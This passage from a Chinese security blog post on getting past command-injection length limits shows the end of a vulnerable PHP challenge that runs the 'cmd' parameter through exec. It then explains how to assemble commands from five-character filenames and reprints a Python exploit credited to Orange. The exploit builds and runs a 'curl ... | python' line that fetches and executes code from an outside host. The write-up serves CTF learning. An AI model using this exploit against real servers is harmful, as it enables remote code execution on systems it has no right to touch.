       @<span class="token function">exec</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'reset'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
       @<span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">'/bin/rm -rf '</span> <span class="token punctuation">.</span> <span class="token variable">$sandbox</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token punctuation">}</span>
   <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre>
<p>这个字符长度限制不能大于5个，我们写字符还是可以的，但是我们的<code>ls -t&gt;a</code>用不了，不过我们可以用前面的思路，把<code>ls -t&gt;a</code>拆分为几段放在一个文件中，然后再执行。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190121100854-811f807e-1d21-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>可以发现2-5行是可以执行<code>ls -t&gt;g</code>的，然后后面的步骤就和前面一题一样了，这里就不多赘述了<br>贴一下Orange师傅的exp：</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">from</span> time <span class="token keyword">import</span> sleep
<span class="token keyword">from</span> urllib <span class="token keyword">import</span> quote
payload <span class="token operator">=</span> <span class="token punctuation">[</span>
   <span class="token comment" spellcheck="true"># generate `ls -t>g` file</span>
   <span class="token string">'>ls\\'</span><span class="token punctuation">,</span>
   <span class="token string">'ls>_'</span><span class="token punctuation">,</span>
   <span class="token string">'>\ \\'</span><span class="token punctuation">,</span>
   <span class="token string">'>-t\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>\>g'</span><span class="token punctuation">,</span>
   <span class="token string">'ls>>_'</span><span class="token punctuation">,</span>
   <span class="token comment" spellcheck="true"># generate `curl orange.tw.tw>python`</span>
   <span class="token comment" spellcheck="true"># curl shell.0xb.pw|python</span>
   <span class="token string">'>on'</span><span class="token punctuation">,</span>
   <span class="token string">'>th\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>py\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>\|\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>pw\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>x.\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>xx\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>l.\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>el\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>sh\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>\ \\'</span><span class="token punctuation">,</span>
   <span class="token string">'>rl\\'</span><span class="token punctuation">,</span>
   <span class="token string">'>cu\\'</span><span class="token punctuation">,</span>
   <span class="token comment" spellcheck="true"># exec</span>
   <span class="token string">'sh _'</span><span class="token punctuation">,</span>
   <span class="token string">'sh g'</span><span class="token punctuation">,</span>
<span class="token punctuation">]</span>
<span class="token comment" spellcheck="true"># r = requests.get('http://localhost/tmp/?reset=1')</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> payload<span class="token punctuation">:</span>
   <span class="token keyword">assert</span> len<span class="token punctuation">(</span>i<span class="token punctuation">)</span> <span class="token operator">&lt;=</span> <span class="token number">5</span>
   r <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">'http://localhost/tmp/?cmd='</span> <span class="token operator">+</span> quote<span class="token punctuation">(</span>i<span class="token punctuation">)</span> <span class="token punctuation">)</span>
   <span class="token keyword">print</span> i
   sleep<span class="token punctuation">(</span><span class="token number">0.2</span><span class="token punctuation">)</span>
</code></pre>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://portswigger.net/web-security/os-command-injection" title="https://portswigger.net/web-security/os-command-injection" target="_blank" rel="noopener">https://portswigger.net/web-security/os-command-injection</a><br><a href="https://mp.weixin.qq.com/s/Hm6TiLHiAygrJr-MGRq9Mw" title="https://mp.weixin.qq.com/s/Hm6TiLHiAygrJr-MGRq9Mw" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/Hm6TiLHiAygrJr-MGRq9Mw</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2019-05-14T16:29:34.242Z" itemprop="dateUpdated">2019-05-15 00:29:34</time>
</span><br>


        
        know it then hack it
        
    </div>
    
    <footer>
        <a href="https://byqiyou.github.io">
            <img src="/img/avatar.jpg" alt="七友">
            七友
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/一些姿势/">一些姿势</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&title=《Bypass一些命令注入限制的姿势》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&title=《Bypass一些命令注入限制的姿势》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Bypass一些命令注入限制的姿势》 — 七友&url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/02/13/Hashcat的使用手册总结/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">Hashcat的使用手册总结</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2018/12/24/Phar的一些利用姿势/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">Phar的一些利用姿势</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'true';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>



















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        Thinks
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/2.png" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/2.png" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span>七友 &copy; 2015 - 2019</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&title=《Bypass一些命令注入限制的姿势》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&title=《Bypass一些命令注入限制的姿势》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Bypass一些命令注入限制的姿势》 — 七友&url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://byqiyou.github.io/2019/02/01/Bypass一些命令注入限制的姿势/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
